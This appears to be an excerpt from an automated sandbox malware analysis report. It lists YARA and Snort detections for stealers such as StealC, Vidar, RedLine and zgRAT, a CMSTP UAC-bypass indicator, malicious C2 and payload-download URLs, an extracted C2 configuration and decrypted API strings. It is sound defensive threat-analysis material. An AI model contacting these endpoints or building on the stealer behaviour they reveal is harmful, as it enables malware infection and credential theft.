14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195248d0000.15.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195248d0000.15.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.cmd.exe.5240e64.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.5240e64.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
21.2.cmd.exe.4a3d264.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.4a3d264.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
2.2.run.exe.3f9086d.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.3f9086d.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
20.2.run.exe.39e0d5b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.run.exe.39e0d5b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
3.2.cmd.exe.5240264.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.5240264.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.run.exe.3fd4d5b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.3fd4d5b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
1.3.u5mc.0.exe.41b0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5mc.0.exe.41b0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
3.2.cmd.exe.5c100c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cmd.exe.5c100c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.cmd.exe.5c100c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1f5962:$s1: file:/// 0x1f5872:$s2: {11111-22222-10009-11112} 0x1f58f2:$s3: {11111-22222-50001-00000} 0x8177c:$s4: get_Module 0xe7db1:$s4: get_Module 0x1f3b25:$s4: get_Module 0xe9204:$s5: Reverse 0x1f3e0b:$s5: Reverse 0x8da95:$s6: BlockCopy 0x212279:$s6: BlockCopy 0x83c60:$s7: ReadByte 0x1f5974:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x21d805:$s1: file:/// 0x21d711:$s2: {11111-22222-10009-11112} 0x21d795:$s3: {11111-22222-50001-00000} 0x21ba10:$s4: get_Module 0x5679d:$s5: Reverse 0x21bd3d:$s5: Reverse 0x5b3e4:$s6: BlockCopy 0x218c1a:$s6: BlockCopy 0x56ce2:$s7: ReadByte 0x21d817:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x20e3df:$s1: file:/// 0x20e2eb:$s2: {11111-22222-10009-11112} 0x20e36f:$s3: {11111-22222-50001-00000} 0x20c5ea:$s4: get_Module 0x47377:$s5: Reverse 0x20c917:$s5: Reverse 0x4bfbe:$s6: BlockCopy 0x2097f4:$s6: BlockCopy 0x478bc:$s7: ReadByte 0x20e3f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.0.u5mc.3.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x33fd85:$s1: file:/// 0x33fc95:$s2: {11111-22222-10009-11112} 0x33fd15:$s3: {11111-22222-50001-00000} 0x1b26e8:$s4: get_Module 0x2b78fa:$s4: get_Module 0x33df48:$s4: get_Module 0x1b3b3b:$s5: Reverse 0x1f3faf:$s5: Reverse 0x33e22e:$s5: Reverse 0x2c3c13:$s6: BlockCopy 0x35c69c:$s6: BlockCopy 0x2b9dde:$s7: ReadByte 0x33fd97:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x31b97b:$s1: file:/// 0x31b88b:$s2: {11111-22222-10009-11112} 0x31b90b:$s3: {11111-22222-50001-00000} 0x18e2de:$s4: get_Module 0x2934f0:$s4: get_Module 0x319b3e:$s4: get_Module 0x18f731:$s5: Reverse 0x1cfba5:$s5: Reverse 0x319e24:$s5: Reverse 0x29f809:$s6: BlockCopy 0x338292:$s6: BlockCopy 0x2959d4:$s7: ReadByte 0x31b98d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x366b8f:$s1: file:/// 0x366a9f:$s2: {11111-22222-10009-11112} 0x366b1f:$s3: {11111-22222-50001-00000} 0x1d94f2:$s4: get_Module 0x2de704:$s4: get_Module 0x364d52:$s4: get_Module 0x1da945:$s5: Reverse 0x21adb9:$s5: Reverse 0x365038:$s5: Reverse 0x2eaa1d:$s6: BlockCopy 0x3834a6:$s6: BlockCopy 0x2e0be8:$s7: ReadByte 0x366ba1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1fddd5:$s1: file:/// 0x1fdce1:$s2: {11111-22222-10009-11112} 0x1fdd65:$s3: {11111-22222-50001-00000} 0x1fbfe0:$s4: get_Module 0x36d6d:$s5: Reverse 0x1fc30d:$s5: Reverse 0x3b9b4:$s6: BlockCopy 0x1f91ea:$s6: BlockCopy 0x372b2:$s7: ReadByte 0x1fdde7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 81 entries

Snort Signatures

ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 185.172.128.90

Timestamp:	04/26/24-10:26:56.207351
SID:	2856233
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/26/24-10:27:02.662958
SID:	2051831
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/26/24-10:27:01.406784
SID:	2044243
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/26/24-10:27:01.961415
SID:	2044244
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/26/24-10:27:02.310581
SID:	2051828
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/26/24-10:27:02.312846
SID:	2044246
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0	Avira URL Cloud: Label: malware
Source: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08	Avira URL Cloud: Label: malware
Source: http://185.172.128.59/syncUpd.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.228/ping.php?substr=one	Avira URL Cloud: Label: malware
Source: http://185.172.128.203/tiktok.exe	Avira URL Cloud: Label: malware
Source: http://91.215.85.66:9000	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\ougwwmmp	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: u5mc.0.exe.7364.1.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0	Virustotal: Detection: 20%	Perma Link
Source: http://185.172.128.228/BroomSetup.exe	Virustotal: Detection: 22%	Perma Link
Source: 185.172.128.76/3cd2b41cbde8fc9c.php	Virustotal: Detection: 15%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/sqlite3.dll	Virustotal: Detection: 8%	Perma Link
Source: http://185.172.128.76/3cd2b41cbde8fc9c.php	Virustotal: Detection: 15%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/nss3.dllx	Virustotal: Detection: 8%	Perma Link
Source: http://185.172.128.59/syncUpd.exe	Virustotal: Detection: 22%	Perma Link
Source: http://185.172.128.228/ping.php?substr=one	Virustotal: Detection: 18%	Perma Link
Source: http://185.172.128.76	Virustotal: Detection: 10%	Perma Link
Source: http://185.172.128.203/tiktok.exe	Virustotal: Detection: 19%	Perma Link
Source: http://185.172.128.203/tiktok.exe00	Virustotal: Detection: 15%	Perma Link
Source: http://185.172.128.76/3cd2b41cbde8fc9c.phpk	Virustotal: Detection: 7%	Perma Link
Source: http://91.215.85.66:9000	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\ougwwmmp	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: QPoX60yhZt.exe

Virustotal: Detection: 41%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ougwwmmp	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: QPoX60yhZt.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: OpenEventA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CreateEventA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Sleep
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: VirtualFree
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: VirtualAlloc
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: user32.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ntdll.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sscanf
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: VMwareVMware
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: DISPLAY
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: http://185.172.128.76
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: /3cd2b41cbde8fc9c.php
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: /15f649199f40275b/
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: default10
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GlobalLock
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: HeapFree
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Process32Next
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Process32First
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: LocalFree
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: FindClose
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ReadFile
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: WriteFile
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetLastError
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: TerminateProcess
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: psapi.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: rstrtmgr.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SelectObject
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: BitBlt
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GdipFree
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CoUninitialize
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CoInitialize
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CoCreateInstance
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: BCryptDecrypt
